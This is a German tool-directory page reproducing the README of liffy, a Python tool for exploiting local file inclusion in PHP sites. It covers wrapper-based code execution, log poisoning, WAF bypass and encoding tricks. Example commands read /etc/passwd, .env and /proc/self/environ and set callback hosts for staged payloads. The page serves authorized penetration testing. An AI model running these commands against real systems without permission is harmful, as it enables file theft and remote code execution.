Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
liffy — Tool zur Ausnutzung lokaler Dateieinbindung | Kitploit
Tools/GitHubGitHub/mzfr/liffy
SchwachstellenanalyseWebanwendungs-ExploitationWAF-UmgehungPenetrationstestsPayload-Entwicklung
GitHubmzfr/liffy

liffy

Tool zur Ausnutzung lokaler Dateieinbindung

Repository anzeigen
9781148vor 3 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

GitSpo Mentions License: GPL v3 Maintenance Rawsec's CyberSecurity Inventory

Packaging status


liffy

Erweitertes LFI-Exploitationswerkzeug

liffy in Aktion

Ein leistungsstarkes Python-Tool zur Ausnutzung von Local File Inclusion (LFI) mit erweiterten Funktionen, darunter WAF-Umgehung, Kodierungstechniken und umfassende Schwachstellenerkennung.

Liffy v2.0 ist die erheblich verbesserte Version von liffy, die ursprünglich von rotlogix/liffy erstellt wurde. Diese Version enthält moderne Funktionen wie Rich-Terminal-Ausgabe, YAML-Konfiguration, verbessertes Multithreading und mehrere fortgeschrittene Exploitationstechniken.

⚠️ Viele der neuen Änderungen wurden vibe coded.

Inhaltsverzeichnis

  • Funktionen
  • Installation
  • Verwendung
  • Konfiguration
  • Fortgeschrittene Techniken
  • Beispiele
  • Beitrag
  • Credits

Funktionen

Kern-LFI-Techniken

  • data:// - Code-Ausführung über Data-Wrapper
  • expect:// - Code-Ausführung über Expect-Wrapper
  • input:// - Code-Ausführung über Input-Wrapper
  • filter:// - Beliebige Dateiauslesung über Filter-Wrapper
  • /proc/self/environ - Code-Ausführung im CGI-Modus
  • Apache-Zugriffslog-Poisoning - Ausnutzung von Logdateien
  • Linux-auth.log-SSH-Poisoning - Ausnutzung von SSH-Logs
  • Null-Byte-Poisoning - Legacy-PHP-Nullbyte-Angriffe
  • ZIP-Wrapper-Ausnutzung - ZIP-Datei-Inklusionsangriffe
  • Wrapper-Erkennung - Sichere Sonden für gängige LFI-Stream-Wrapper
  • Out-of-Band-Sonden - Callback-Payloads für blindes Wrapper-/SSRF-ähnliches Verhalten
  • Blinde LFI-Prüfungen - Antwortunterschied-Sonden, wenn Dateiinhalte nicht widergespiegelt werden
  • Auto-Scan-Modus - Sicherer erkennungsorientierter Scan-Plan über Traversal, Wrapper und blinde Prüfungen

Erweiterte Funktionen

  • WAF-Umgehung - Mehrere Umgehungstechniken für gängige WAFs
  • Erweiterte Kodierung - Doppelte URL-Kodierung, Unicode, Groß-/Kleinschreibungsvarianten
  • POST-Anfrageunterstützung - Vollständige POST-Methodenunterstützung mit benutzerdefinierten Daten
  • Benutzerdefinierte Header - Konfigurierbare HTTP-Header
  • User-Agent-Rotation - Zufällige User-Agents zur Vermeidung von Erkennung
  • Ratenbegrenzung - Konfigurierbare Anfragedrosselung
  • Multithreading - Verbessertes Thread-Pool-Management
  • Erkennungsmodus - Schwachstellenscan ohne Exploitation
  • Rich-Terminal-Ausgabe - Schöne farbige Ausgabe mit Fortschrittsbalken
  • YAML-Konfiguration - Dauerhafte Einstellungsverwaltung

Moderne Verbesserungen

  • Verbesserte Schwachstellenerkennung - Erweiterte Antwortanalyse mit Vertrauensbewertung
  • Thread-Pool-Management - Optimierte Leistung durch adaptives Multithreading
  • Konfigurationsmanagement - YAML-basierte Einstellungen mit CLI-Überschreibungen
  • Umfassende Protokollierung - Detaillierte Ausführungsberichte und Fortschrittsverfolgung

Installation

Stellen Sie sicher, dass Sie Python 3 verwenden. Liffy unterstützt Python 2 nicht. Die folgenden Beispiele verwenden uv run python, sodass die Befehle innerhalb der Projektumgebung ausgeführt werden.

root@kitploit:~
# Install uv if you haven't already
curl -LsSf https://astral.sh/uv/install.sh | sh

# Clone the repository
git clone https://github.com/mzfr/liffy
cd liffy

# Create virtual environment with uv
uv venv

# Install dependencies from pyproject.toml
uv sync

# Run liffy
uv run python liffy.py --help

Verwendung

Grundlegende Syntax

root@kitploit:~
uv run python liffy.py <URL> [OPTIONS]

Befehlszeilenoptionen

root@kitploit:~
usage: liffy.py [-h] [-d] [-i] [-e] [-f] [-p] [-a] [-ns] [-r] [--ssh]
                [-l LOCATION] [--cookies COOKIES] [-dt] [-t THREADS]
                [--detection] [--null-byte] [--zip] [--encoding]
                [--waf-bypass] [--method {GET,POST}] [--post-data POST_DATA]
                [--headers HEADERS] [--lhost LHOST] [--lport LPORT]
                [--read-file READ_FILE] [-y] [--timeout TIMEOUT]
                [--proxy PROXY] [--verify-tls] [--user-agent USER_AGENT]
                [--oob] [--oob-url OOB_URL] [--blind] [--auto]
                [--delay DELAY] [--retries RETRIES] [--json] [--output OUTPUT]
                [--quiet] [--no-color] [--no-banner] [--config]
                [url]

positional arguments:
  url                   URL to test for LFI

Core Techniques:
  -d, --data            Use data:// technique
  -i, --input           Use input:// technique
  -e, --expect          Use expect:// technique
  -f, --filter          Use filter:// technique
  -p, --proc            Use /proc/self/environ technique
  -a, --access          Apache access logs technique
  --ssh                 SSH auth log poisoning
  -dt, --directorytraverse  Test for Directory Traversal
  --null-byte           Test for Null Byte Poisoning
  --zip                 Test for ZIP wrapper exploitation
  --wrappers, --wrapper Detect common LFI stream wrappers
  --wrapper-list WRAPPER_LIST
                        Path to custom wrapper probe payload list
  --oob                 Send out-of-band callback probes
  --oob-url OOB_URL     OOB callback base URL
  --blind               Run blind LFI response-difference checks
  --blind-list BLIND_LIST
                        Path to custom blind LFI probe list
  --auto                Run a safe automatic scan plan

Advanced Options:
  --encoding            Use advanced encoding/bypass techniques
  --waf-bypass          Use WAF evasion techniques
  --method {GET,POST}   HTTP method to use (default: GET)
  --post-data POST_DATA POST data (format: key=value&key2=value2)
  --headers HEADERS     Custom headers (format: Header1:Value1,Header2:Value2)
  --detection           Only perform LFI detection, no exploitation

Request Options:
  --timeout TIMEOUT     HTTP request timeout in seconds
  --proxy PROXY         HTTP(S) proxy URL, e.g. http://127.0.0.1:8080
  --verify-tls          Verify TLS certificates instead of using insecure requests
  --user-agent UA       Custom User-Agent header
  --delay DELAY         Delay between requests in seconds
  --retries RETRIES     HTTP retries per request

Automation Options:
  --lhost LHOST         Callback host for staged payloads
  --lport LPORT         Callback port for staged payloads
  --read-file PATH      File path to read with filter://
  -y, --yes             Use defaults for prompts and run non-interactively
  --json                Print a JSON run summary
  --output OUTPUT       Write JSON run summary to a file
  --quiet               Suppress normal terminal output

General Options:
  -ns, --nostager       Execute payload directly, do not use stager
  -r, --relative        Use path traversal sequences for attack
  -l, --location LOCATION  Path to target file (access log, auth log, etc.)
  --cookies COOKIES     Session cookies for authentication
  -t, --threads THREADS Number of threads to use (default: 5)
  --no-color            Disable colored output
  --no-banner           Disable banner display
  --config              Create default YAML configuration file

Konfiguration

YAML-Konfiguration

Erstellen Sie eine Konfigurationsdatei für dauerhafte Einstellungen:

root@kitploit:~
uv run python liffy.py --config

Dies erstellt liffy_config.yaml mit Standardeinstellungen:

root@kitploit:~
# Liffy Configuration File
max_threads: 5
rate_limit_delay: 0.1
disable_colors: false
disable_banner: false
quiet: false
default_method: GET
user_agent_rotation: true
request_timeout: 15
proxy: null
verify_tls: false
retries: 0

Setzen Sie disable_banner: true, um das Startbanner/-logo standardmäßig auszublenden. CLI-Flags überschreiben weiterhin die Konfigurationswerte, sodass Sie auch --no-banner, --no-color oder --quiet für einmalige Ausführungen verwenden können.

Umgebungsvariablen

Sie können auch Umgebungsvariablen verwenden:

  • LIFFY_THREADS - Anzahl der Threads
  • LIFFY_RATE_LIMIT - Verzögerung der Ratenbegrenzung
  • LIFFY_NO_COLOR - Farben deaktivieren (true/false)

Fortgeschrittene Techniken

WAF-Umgehungstechniken

Wenn --waf-bypass aktiviert ist, wendet liffy automatisch mehrere Umgehungstechniken an:

  • Kommentar-Injektion: /**/, #, ;
  • Protokoll-Verwirrung: file:///, pHp://
  • Kodierungsschichtung: Mehrere Kodierungskombinationen
  • Pfadverschleierung: ./, ../, Nullbytes

Kodierungs-Umgehungstechniken

Mit --encoding wendet liffy erweiterte Kodierungsmethoden an:

  • Doppelte URL-Kodierung: %252e%252e%252f
  • Unicode-Kodierung: \u002e\u002e\u002f
  • Gemischte Groß-/Kleinschreibung: ..%2F, ..%2f
  • HTML-Entity-Kodierung: &#46;&#46;&#47;

POST-Anfrageunterstützung

root@kitploit:~
# POST with form data
uv run python liffy.py "http://target.com/lfi.php" -d --method POST --post-data "file=../../etc/passwd"

# POST with custom headers
uv run python liffy.py "http://target.com/lfi.php" -d --method POST --headers "X-Forwarded-For:127.0.0.1,Authorization:Bearer token123"

Anfrageanpassung

root@kitploit:~
# Send traffic through a local proxy and retry transient failures
uv run python liffy.py "http://target.com/lfi.php?file=" -d \
  --proxy "http://127.0.0.1:8080" --timeout 20 --retries 2

# Use a fixed User-Agent and custom request delay
uv run python liffy.py "http://target.com/lfi.php?file=" --detection -f \
  --user-agent "liffy/2.0" --delay 0.5

Beispiele

Grundlegendes LFI-Testen

Test mit data://-Wrapper

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d

Test mit mehreren Techniken

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d -i -e -f

Nur Erkennungsmodus

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --detection -d -i -e

Erweiterte Nutzung

WAF-Umgehung mit Kodierung

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d --waf-bypass --encoding

Multithreading mit Ratenbegrenzung

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d -t 10 --config

POST-Anfrage mit benutzerdefinierten Headern

root@kitploit:~
uv run python liffy.py "http://example.com/upload.php" -d --method POST \
  --post-data "action=read&file=../../etc/passwd" \
  --headers "User-Agent:Mozilla/5.0,X-Forwarded-For:192.168.1.1"

Log-Poisoning

Apache-Zugriffslog-Poisoning

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -a

SSH-Auth-Log-Poisoning

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --ssh

Benutzerdefinierter Log-Speicherort

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -a -l "/var/log/apache2/access.log"

Directory Traversal

Relativer Pfad-Traversal

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d -r

Directory-Traversal-Test

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -dt

Spezielle Techniken

Null-Byte-Poisoning (Legacy PHP)

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --null-byte

ZIP-Wrapper-Ausnutzung

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --zip

Gängige Wrapper-Erkennung

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --wrappers

Die Wrapper-Erkennung verwendet sichere Standardsonden für file://, php://filter, data://, php://temp, php://memory und verwandte Wrapper. zip://, phar:// und glob:// werden als informativ/bedingt behandelt, da sie normalerweise zielseitige Dateien oder ein Sink-Verhalten erfordern, das Auflistungen freigibt.

Sie können eine benutzerdefinierte Liste von Wrapper-Payloads bereitstellen. Wenn --wrapper-list weggelassen wird, greift liffy auf die integrierten Sonden zurück:

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --wrapper \
  --wrapper-list payload_wordlists/wrappers.txt

Jede nicht leere Zeile kann entweder ein roher Payload oder name=payload sein:

root@kitploit:~
php-filter-passwd=php://filter/read=convert.base64-encode/resource=/etc/passwd
file-winini=file:///c:/windows/win.ini

Out-of-Band-Callback-Sonden

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --oob \
  --oob-url "https://example.oast.site"

Verwenden Sie dies mit einem HTTP/DNS-Callback-Listener. Liffy sendet URL-Wrapper-artige Payloads und Sie überprüfen, ob das Ziel zurückruft.

Blinde LFI-Prüfungen

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --blind

Blinde Prüfungen vergleichen vorhandene Datei-Sonden mit zufälligen Basiswerten fehlender Dateien und melden Status-, Längen- oder Zeitunterschiede, wenn Inhalte nicht direkt widergespiegelt werden.

Sie können eine benutzerdefinierte Liste blinder Sonden bereitstellen. Wenn --blind-list weggelassen oder leer ist, verwendet liffy integrierte Sonden:

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --blind \
  --blind-list payload_wordlists/blind_lfi.txt

Jede nicht leere Zeile kann entweder ein roher Payload oder name=payload sein:

root@kitploit:~
linux-passwd=/etc/passwd
proc-environ=/proc/self/environ
laravel-env=.env

Sicherer automatischer Scan

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --auto

--auto aktiviert nur Erkennungs-Directory-Traversal, Wrapper-Prüfungen und blinde Prüfungen. Wenn auch --oob-url angegeben ist, werden OOB-Sonden eingeschlossen.

Umfassender Scan mit allen Techniken

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" \
  -d -i -e -f -p -a --ssh -dt --null-byte --zip --wrappers --blind \
  --encoding --waf-bypass --detection

Authentifizierung & Cookies

Verwenden von Session-Cookies

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d \
  --cookies "PHPSESSID=abc123; auth_token=xyz789"

Skriptierte / nicht interaktive Nutzung

Callback-Werte ohne Eingabeaufforderungen bereitstellen

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d \
  --lhost 10.10.14.2 --lport 4444 --yes

Eine bestimmte Datei mit filter:// ohne Eingabeaufforderung lesen

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -f \
  --read-file /etc/passwd --yes

Strukturierte Ausgabe

JSON-Zusammenfassung des Laufs ausgeben

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --detection -f --json

JSON-Zusammenfassung auf Disk schreiben, während die Terminalausgabe erhalten bleibt

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --detection -f \
  --output findings.json

Ausgabesteuerung

Farben und Banner deaktivieren

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d --no-color --no-banner

Normale Terminalausgabe unterdrücken

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --detection -f --quiet --output findings.json

Standard-Dateispeicherorte

Die folgenden Standardspeicherorte werden verwendet, wenn kein benutzerdefinierter Pfad angegeben ist:

  • SSH auth.log: /var/log/auth.log
  • Apache access.log: /var/log/apache2/access.log
  • Alternativer Apache-Log: /var/log/httpd/access_log

Beitrag

Wir freuen uns über Beiträge! So können Sie helfen:

Funktionsvorschläge

  • Neue LFI-Exploitationstechniken
  • Zusätzliche WAF-Umgehungsmethoden
  • Verbesserte Kodierungstechniken
  • Payload-Optimierung
  • Erkennungsverbesserungen

Fehlerberichte

  • Melden Sie Probleme über GitHub Issues
  • Fügen Sie detaillierte Reproduktionsschritte bei
  • Geben Sie Details zur Zielumgebung an

Pull Requests

  • Forken Sie das Repository
  • Erstellen Sie einen Feature-Branch
  • Nehmen Sie Ihre Änderungen mit Tests vor
  • Reichen Sie einen Pull Request ein

Zögern Sie nicht, bei Fragen oder Anregungen ein Issue zu eröffnen!

Schwachstellenerkennung

Der Erkennungsmodus von Liffy bietet eine umfassende Schwachstellenanalyse:

Vertrauensbewertung

  • Hohe Vertrauenswürdigkeit (80–100 %): Starke Indikatoren wie Inhalt von /etc/passwd
  • Mittlere Vertrauenswürdigkeit (50–79 %): Teilweiser Dateiinhalt oder verdächtige Antworten
  • Niedrige Vertrauenswürdigkeit (20–49 %): Mögliche Indikatoren, die manuelle Überprüfung erfordern

Erkennungsfunktionen

  • Dateiinhalt-Analyse: Erkennt Linux-, Windows- und PHP-Dateimuster
  • Antwortanalyse: HTTP-Statuscodes, Inhaltslänge, Zeitanalyse
  • WAF-Erkennung: Identifiziert gängige WAF-Signaturen
  • Beweissammlung: Erfasst Nachweise der Schwachstelle für die Berichterstattung

Beispiel einer Erkennungsausgabe

root@kitploit:~
[+] VULNERABILITY SUMMARY
==================================================
[1] Vulnerability Found
    Payload: ../../etc/passwd
    Confidence: 85%
    Evidence: Linux /etc/passwd file: root:
    Status Code: 200
    Content Length: 1547

Fehlerbehebung

Häufige Probleme

WAF blockiert Anfragen

root@kitploit:~
# Use WAF bypass techniques
uv run python liffy.py "http://target.com/lfi.php" -d --waf-bypass

# Reduce thread count and increase delays
uv run python liffy.py "http://target.com/lfi.php" -d -t 1

Probleme mit Ratenbegrenzung

root@kitploit:~
# Increase delay in config file
max_threads: 2
rate_limit_delay: 1.0

Debug-Modus

Für ausführliche Ausgabe können Sie die Konfiguration ändern:

root@kitploit:~
debug_mode: true
verbose_output: true

Sicherheitshinweis

Liffy ist nur für autorisierte Sicherheitstests konzipiert.

  • Verwenden Sie es nur auf Systemen, die Sie besitzen oder für die Sie ausdrückliche Erlaubnis zum Testen haben
  • Befolgen Sie verantwortungsvolle Offenlegungspraktiken
  • Respektieren Sie Ratenbegrenzungen und vermeiden Sie DoS-Bedingungen
  • Beachten Sie die rechtlichen Auswirkungen in Ihrer Gerichtsbarkeit

Die Autoren sind nicht verantwortlich für den Missbrauch dieses Tools.

Credits

Ursprüngliche Inspiration

  • Original liffy von hvqzao
  • Ursprüngliches Konzept von rotlogix/liffy

Techniken und Forschung

  • LFI-Exploitationstechniken aus verschiedenen Sicherheitsforschungen
  • WAF-Umgehungsmethoden aus öffentlichen Sicherheitsressourcen
  • Dokumentation zur PHP-Wrapper-Ausnutzung

Design und Ressourcen

  • Logo-Design von renderforest
  • Terminal-Styling mit der Rich-Bibliothek

Lizenz

Dieses Projekt ist lizenziert unter der GNU General Public License v3.0 – siehe die Datei LICENSE für Details.

Tool herunterladen